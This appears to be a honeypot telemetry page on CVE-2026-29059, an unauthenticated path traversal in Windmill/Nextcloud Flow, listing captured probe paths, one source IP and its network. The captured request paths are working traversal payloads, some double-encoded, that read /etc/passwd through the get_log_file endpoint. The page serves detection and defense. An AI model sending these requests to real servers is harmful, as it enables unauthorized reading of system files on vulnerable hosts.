CVE-2026-29059: Windmill/Nextcloud Flow < 1.603.3 - Unauthenticated Path Traversal
HoneyLabs honeypots recorded 4 probes matching CVE-2026-29059 from 1 distinct source IP addresses in the last 7 days. Severity is rated critical.
Request paths that identify it
- /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd
- /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc…
- /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd
- /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
Addresses probing it
| Source IP | Probes | Network | Country |
|---|---|---|---|
| 93.123.109.214 | 4 | Techoff Srv Limited | Bulgaria |
Networks it comes from
| ASN | Organisation | Probes | Source IPs |
|---|---|---|---|
| AS48090 | Techoff Srv Limited | 4 | 1 |
Captured requests
- /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd
- /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2Fetc%2Fpasswd
- /index.php/apps/app_api/proxy/flow/api/w/_/jobs_u/get_log_file/..%25252F..%25252F..%25252F..%25252F..%25252F..%25252Fetc%25252Fpasswd
- /api/w/_/jobs_u/get_log_file/..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd
CVE report
CVE report
Open a specific CVE from the CVE tracker.